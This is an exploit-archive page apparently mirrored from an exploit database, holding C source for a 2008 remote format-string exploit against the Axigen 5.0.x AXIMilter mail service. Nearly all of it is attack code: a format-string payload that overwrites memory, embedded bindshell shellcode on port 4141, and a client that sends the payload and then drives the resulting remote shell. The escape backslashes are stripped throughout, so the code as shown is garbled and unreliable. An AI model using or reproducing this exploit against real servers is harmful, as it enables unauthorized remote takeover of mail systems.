[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Axigen <= 5.0.2 AXIMilter Remote Format String Exploit
# Published : 2008-01-21
# Author : hempel
# Previous Title : Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit
# Next Title : Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit 


/*
 * Axigen 5.0.x AXIMilter Format String Exploit
 *
 * by hempel (JAN 16 2008)
 *
 * thx to mu-b (digit-labs.org)
 *
 */
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <string.h>

char buf[] = 
    "FROM:rnEHLO:rnCNIP:rnCNPO:rnCNHO: "
/* offsets */
    "xb8x96x05x08xb9x96x05x08xbax96x05x08xbbx96x05x08"
    "xbcx96x05x08xbdx96x05x08xbex96x05x08xbfx96x05x08"
    "xc0x96x05x08"
/* format string */
    "%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
    "17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
    "rnRCPT:rnVERI: "
/* bindshell code (port 4141) */
    "x33xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xdc"
    "xc8x06xb7x83xebxfcxe2xf4xedx13x55xf4x8fxa2x04xdd"
    "xbax90x9fx3ex3dx05x86x21x9fx9ax60xdfxccxe5x60xe4"
    "x55x29x6cxd1x84x98x57xe1x55x29xcbx37x6cxaexd7x54"
    "x11x48x54xe5x8ax8bx8fx56x6cxaexcbx37x4fxa2x04xee"
    "x6cxf7xcbx37x95xb1xffx07xd7x9ax6ex98xf3xbbx6exdf"
    "xf3xaax6fxd9x55x2bx54xe4x55x29xcbx37"
    "rnPASS:rn";

static int
shell_sock (char *host, int port)
{
    struct sockaddr_in addr;
    int sockfd;

    sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if (sockfd == -1) {
        perror ("socket");
	return 0;
    }
    
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(host);
    addr.sin_port = htons(port);

    if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror ("connect");
	return 0;
    }

    return sockfd;
}

static void
shell_run (int sockfd)
{
    int rs;
    fd_set rset;
    char rbuf[1024], *cmd = "id; uname -a; uptimen";

    write(sockfd, cmd, strlen(cmd));
 
    while (1) {
        FD_ZERO (&rset);
        FD_SET (sockfd, &rset);
        FD_SET (STDIN_FILENO, &rset);
        
	select (sockfd + 1, &rset, NULL, NULL, NULL);
	if (FD_ISSET (sockfd, &rset)) {
	    rs = read (sockfd, rbuf, sizeof(rbuf) - 1);
            if (rs <= 0) {
                perror("read");
		return;
            }
	    rbuf[rs] = '';
            printf ("%s", rbuf);
        }
        
	if (FD_ISSET (STDIN_FILENO, &rset)) {
	    rs = read(STDIN_FILENO, rbuf, sizeof(rbuf) - 1);
            if (rs > 0) {
        	rbuf[rs] = '';
        	write (sockfd, rbuf, rs);
            }
        }
    }
}

int 
main(int argc, char **argv)
{
    int sockfd, port, buf_len;
    struct sockaddr_in addr;
    char *host;
    
    printf("AXIGEN 5.0.x AXIMilter format string Exploit by hempeln");
    
    if (argc < 2) {
	printf("%s host portn", *argv);
	return 0;
    }
    
    host = argv[1];
    port = atoi(argv[2]);
        
    sockfd = socket(PF_INET, SOCK_STREAM, 0);
    if(sockfd == -1) {
	perror("socket");
	return -1;
    }
    
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(host);
    addr.sin_port = htons(port);
    
    if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
	perror("connect");
	return -1;
    }
    
    buf_len = sizeof(buf) - 1;
    if (write(sockfd, buf, buf_len) == -1) {
	perror("write");
	return -1;
    }    
    close(sockfd);

    printf("trying shell at %s:4141 ...", host);
    fflush(stdout);
    sockfd = shell_sock(host, 4141);
    if (sockfd) {
	printf("w00t!n");
	shell_run(sockfd);
    } else {
	printf("nope!n");
    }
    
    return 0;
}

// www.Syue.com [2008-01-21]